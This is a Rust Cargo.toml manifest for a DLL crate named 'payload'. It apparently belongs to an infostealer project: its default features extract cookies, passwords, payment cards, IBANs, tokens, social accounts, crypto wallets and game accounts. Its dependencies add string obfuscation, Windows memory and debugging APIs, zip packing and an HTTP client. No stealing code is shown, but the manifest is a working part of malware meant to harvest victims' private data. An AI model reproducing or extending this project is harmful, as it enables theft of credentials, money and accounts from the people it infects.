[package]
name = "payload"
version = "0.1.0"
edition = "2021"

[lib]
crate-type = ["cdylib", "rlib"]

[features]
default = ["extract_cookies", "extract_passwords", "extract_cards", "extract_ibans", "extract_tokens", "extract_bookmarks", "extract_socials", "extract_wallets", "extract_games"]
extract_cookies = ["kurion_extractor/extract_cookies"]
extract_passwords = ["kurion_extractor/extract_passwords"]
extract_cards = ["kurion_extractor/extract_cards"]
extract_ibans = ["kurion_extractor/extract_ibans"]
extract_tokens = ["kurion_extractor/extract_tokens"]
extract_bookmarks = ["kurion_extractor/extract_bookmarks"]
extract_socials = ["kurion_extractor/extract_socials"]
extract_wallets = ["kurion_extractor/extract_wallets"]
extract_games = ["kurion_extractor/extract_games"]

[dependencies]
windows = { version = "0.58", features = [
    "Win32_Foundation",
    "Win32_System_SystemServices",
    "Win32_System_LibraryLoader",
    "Win32_System_Memory",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_Threading",
    "Win32_System_Console",
    "Win32_Security",
    "Win32_System_Pipes",
    "Win32_Storage_FileSystem",
    "Win32_UI_Shell",
    "Win32_System_IO",
] }
rusqlite = { version = "0.32", features = ["bundled"] }
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
kurion_core = { path = "../core" }
kurion_sys = { path = "../sys" }
kurion_crypto = { path = "../crypto" }
kurion_extractor = { path = "../extractor" }
hex = "0.4"
obfstr = "0.4"
zip = { version = "2.1", default-features = false }
ureq = { version = "2.10", default-features = false, features = ["tls"] }
walkdir = "2"
